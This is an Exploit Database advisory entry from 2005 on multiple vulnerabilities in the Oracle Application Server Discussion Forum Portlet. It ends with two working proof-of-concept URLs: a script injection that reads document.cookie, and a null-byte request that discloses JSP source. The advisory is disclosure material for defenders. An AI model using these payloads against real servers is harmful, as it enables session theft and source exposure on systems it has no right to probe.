oracle Application server discussion forum portlet - Multiple Vulnerabilities

EDB-ID:

26972




Platform:

JSP

Date:

2005-12-23


source: https://www.securityfocus.com/bid/16048/info

Oracle Application Server Discussion Forum Portlet is affected by multiple remote vulnerabilities.

The following specific vulnerabilities were identified:

The application is prone to a cross-site scripting vulnerability.

Discussion Forum Portlet is also affected by multiple HTML injection vulnerabilities.

The application is vulnerable to a source code disclosure vulnerability as well.

All versions of Oracle Application Server Discussion Forum Portlet are considered to be vulnerable. It should be noted that Oracle Application Server Discussion Forum Portlet is not meant to be used in a production environment. 

Cross-site scripting:
http://www.example.com/portal/page?_pageid=XXX,XXX&_dad=portal&_schema=PORTAL&
df_next_page=htdocs/forums.jsp&
RowKeyValue=<script>alert(document.cookie)</script>

Source code disclosure:
http://www.example.com/portal/page?_pageid=XXX,XXX&_dad=portal&_schema=PORTAL&
df_next_page=htdocs/search.jsp%00